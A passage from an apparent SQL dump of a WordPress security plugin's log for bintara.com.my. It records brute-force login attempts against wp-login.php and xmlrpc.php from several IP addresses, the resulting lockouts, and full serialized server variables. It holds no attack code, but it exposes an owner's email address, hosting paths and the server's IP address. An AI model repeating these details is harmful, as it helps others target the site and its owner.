";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6QFiJ7D9Gn7wDPh8oawAAAM4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077825.0297\";s:12:\"REQUEST_TIME\";s:10:\"1569077825\";}}','notice','2019-09-21 14:57:06','2019-09-21 14:57:05',19137112,20626648,'https://bintara.com.my/blog/wp-login.php',1,0,'81.177.174.10'),(26445,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:57:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:57:05\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:57:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:57:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:57:06','2019-09-21 14:57:05',19222008,20626648,'https://bintara.com.my/blog/wp-login.php',1,0,'81.177.174.10'),(26446,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:57:06','2019-09-21 14:57:05',19429104,20626648,'https://bintara.com.my/blog/wp-login.php',1,0,'81.177.174.10'),(26447,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6WXkXpgmG5P@iB8lD@wAAAJA\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.52.111\";s:11:\"REMOTE_PORT\";s:5:\"50906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6WXkXpgmG5P@iB8lD@wAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077849.6365\";s:12:\"REQUEST_TIME\";s:10:\"1569077849\";}}','notice','2019-09-21 14:57:31','2019-09-21 14:57:30',19135072,20626352,'https://bintara.com.my/wordpress/wp-login.php',1,0,'150.95.52.111'),(26448,0,'lockout','host-lockout::150.95.52.111','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"150.95.52.111\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:57:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:57:30\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:57:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:57:30\";s:12:\"lockout_host\";s:13:\"150.95.52.111\";}','action','2019-09-21 14:57:31','2019-09-21 14:57:30',19220344,20626352,'https://bintara.com.my/wordpress/wp-login.php',1,0,'150.95.52.111'),(23563,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.224.177.48\";s:11:\"REMOTE_PORT\";s:5:\"35020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzUeT42Bg6xBpmAmGwUxwAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567413369.1982\";s:12:\"REQUEST_TIME\";s:10:\"1567413369\";}}','notice','2019-09-02 08:36:10','2019-09-02 08:36:09',17684792,19174888,'https://bintara.com.my/wp-login.php',1,0,'216.224.177.48'),(23564,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.158.182\";s:11:\"REMOTE_PORT\";s:5:\"27564\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzX6Wje8g9YegPUhtOpUQAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567414249.7377\";s:12:\"REQUEST_TIME\";s:10:\"1567414249\";}}','notice','2019-09-02 08:50:50','2019-09-02 08:50:50',17686760,19177784,'https://bintara.com.my/wp-login.php',1,0,'128.199.158.182'),(23565,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.158.182\";s:11:\"REMOTE_PORT\";s:5:\"27844\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzX68HMNng1AySUGybE-gAAAME\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567414251.7242\";s:12:\"REQUEST_TIME\";s:10:\"1567414251\";}}','notice','2019-09-02 08:50:53','2019-09-02 08:50:52',18204664,19503904,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.158.182'),(23566,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.4.213.48\";s:11:\"REMOTE_PORT\";s:5:\"33272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzcDT42Bg6xBpmAmGwbnwAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567415309.7134\";s:12:\"REQUEST_TIME\";s:10:\"1567415309\";}}','notice','2019-09-02 09:08:31','2019-09-02 09:08:30',17684992,19176448,'https://bintara.com.my/wp-login.php',1,0,'142.4.213.48'),(23567,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.4.213.48\";s:11:\"REMOTE_PORT\";s:5:\"33634\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzcED42Bg6xBpmAmGwboAAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567415312.8887\";s:12:\"REQUEST_TIME\";s:10:\"1567415312\";}}','notice','2019-09-02 09:08:34','2019-09-02 09:08:33',18205128,19503736,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.213.48'),(23568,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"37015\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzkVrKqO4n7fHB27AQgIwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567417431.0396\";s:12:\"REQUEST_TIME\";s:10:\"1567417431\";}}','notice','2019-09-02 09:43:52','2019-09-02 09:43:51',17687608,19178800,'https://bintara.com.my/wp-login.php',1,0,'188.165.233.82'),(23569,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"37266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzkWbKqO4n7fHB27AQgKgAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567417433.9242\";s:12:\"REQUEST_TIME\";s:10:\"1567417433\";}}','notice','2019-09-02 09:43:55','2019-09-02 